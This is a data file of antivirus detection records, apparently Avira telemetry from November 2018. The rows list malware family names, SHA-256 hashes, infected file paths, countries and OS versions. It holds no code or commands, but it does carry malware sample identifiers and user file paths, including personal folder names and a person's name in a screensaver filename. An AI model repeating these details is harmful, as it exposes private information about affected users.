  Row(detection=Row(filename='avscan-20181102-060323-f9c113df', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060323-F9C113DF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060648-747c6ae2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060648-747C6AE2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:06:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055140-57419f86', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055140-57419F86', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054459-67c1c234', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054459-67C1C234', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061717-eb04b66c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061717-EB04B66C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052732-f7f499cc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052732-F7F499CC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052332-690f1e0b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052332-690F1E0B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052939-43a07a29', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052939-43A07A29', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053545-1de6ef46', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053545-1DE6EF46', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052953-4c16a10e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052953-4C16A10E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062534-131ef43a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062534-131EF43A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055149-5c93ad9e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055149-5C93AD9E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052924-3a8fb662', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052924-3A8FB662', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052639-d889988e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052639-D889988E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052333-6955a34c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052333-6955A34C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051633-6f13f457', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051633-6F13F457', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060817-a93fa3f6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060817-A93FA3F6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052912-3358814e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052912-3358814E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052445-94524ba8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052445-94524BA8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053820-7a2b3e0d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053820-7A2B3E0D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='steam_api_c.dll', filepath='C:\\chon\\steam_api_c.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='7cea36e5dfa494f024986632c183f2498cca22254c8de274076a89f13bb305ec', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:43:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T16:40:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054124-e7fdf57e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054124-E7FDF57E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054346-3c35fef8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054346-3C35FEF8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055954-7d550c12', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055954-7D550C12', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051424-225e867b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051424-225E867B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='afuwin.exe', filepath='C:\\PROGRAM FILES (X86)\\ASUS\\AI SUITE II\\ASUS UPDATE\\Compal\\32\\afuwin.exe', filesize=336000, name='W32/Sality.AT.#M1.#R1'), hash='889f3913186ad848c1d0fa352980995ccb7931c21935928e7efb390d916ee905', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:01:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060221-d5155340', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060221-D5155340', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054432-57f4a1d8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054432-57F4A1D8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062218-9e3f4699', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062218-9E3F4699', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053336-d0f8fd98', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053336-D0F8FD98', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052500-9d2b9d77', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052500-9D2B9D77', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061555-ba22efe9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061555-BA22EFE9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T09:44:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052504-9f8f1827', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052504-9F8F1827', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered tisir', filepath='C:\\WINDOWS\\System32\\Tasks\\Yahoo! Powered tisir', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='8526df54488745e1e85c05d2a04cd546df21d06ba727eeae68b84f25a5b2cf6b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T17:00:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055940-752e58ee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055940-752E58EE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051223-da32448f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051223-DA32448F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054410-4abc23bc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054410-4ABC23BC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051734-93a37546', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051734-93A37546', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='74e59d4e29e4026cffd9bbfda2ee04fb4f70ac813e2573f9392366d2569f169d.mrg', filepath='D:\\TotalAutomation\\CategorizationLayer\\21.11.2017-393.available\\Avira\\Others\\PE-detected-Avira\\HEUR.AGEN.1032585\\74e59d4e29e4026cffd9bbfda2ee04fb4f70ac813e2573f9392366d2569f169d.MRG', filesize=704000, name='HEUR/AGEN.1032585.#M1.#R1'), hash='74e59d4e29e4026cffd9bbfda2ee04fb4f70ac813e2573f9392366d2569f169d', metadata=Row(cmdline='D:\\\\\\\\TotalAutomation\\\\\\\\CategorizationLayer\\\\\\\\21.12.2017-141.available\\\\\\\\Avira\\\\\\\\Others\\\\\\\\PE-detected-Avira -PERHASH', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\TotalAutomation\\Dependencies\\Buf\\WWPERHASH.exe', parentsize=1842176, timestamp='2018-11-02T16:03:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='steam_api_c.dll', filepath='C:\\chon\\steam_api_c.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='7cea36e5dfa494f024986632c183f2498cca22254c8de274076a89f13bb305ec', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:38:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051731-919f107e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051731-919F107E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='joanice aparecida anjos da silva .scr', filepath='C:\\Users\\X\\Desktop\\Joanice Aparecida Anjos da Silva .scr', filesize=320000, name='WORM/Nenebra.A.#M1.#R1'), hash='53a514f013d76540f5daf64de34a640b8a214a9af019a5c257fd562ca7d50ee5', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe2_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe2 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T16:41:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='213691076015634.acv.zzz', filepath='D:\\Sagar__\\Trojan.Win32.Fareit.gi\\213691076015634.acv.zzz', filesize=192000, name='TR/AD.Fareit.Y.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:32:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='2815e2decbed0963deb862b58fdc4a3f37d930314d177dcfddc561319dfcb3b9', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\2815E2DECBED0963DEB862B58FDC4A3F37D930314D177DCFDDC561319DFCB3B9', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='2815e2decbed0963deb862b58fdc4a3f37d930314d177dcfddc561319dfcb3b9', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:58:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mei0312.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\Borong\\PAGI\\MEI0312\\MEI0312.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:21:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160124-f86db038', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160124-F86DB038', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:01:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='for trainer.scr', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\LPA\\PROPOSAL LPA\\TRAINING FOR TRAINER\\FOR TRAINER.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:23:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='30 english.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\RPG\\AUDIT\\Suggestion Corrective Action\\GSM\\GSM VERSI ENGLISH\\NC 30 English\\30 English.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:23:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-105748-3b867844', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_735ad0b6\\AVSCAN-20181101-105548-25D20D21\\AVSCAN-20181101-105748-3B867844', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-01T12:08:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='nc 34.pif', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\sharing\\DINI\\RPG\\AUDIT\\Suggestion Corrective Action\\TEMUAN CAP AEON\\NC 34\\NC 34.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:26:24Z'), dt=datetime.date(2018, 11, 1)),
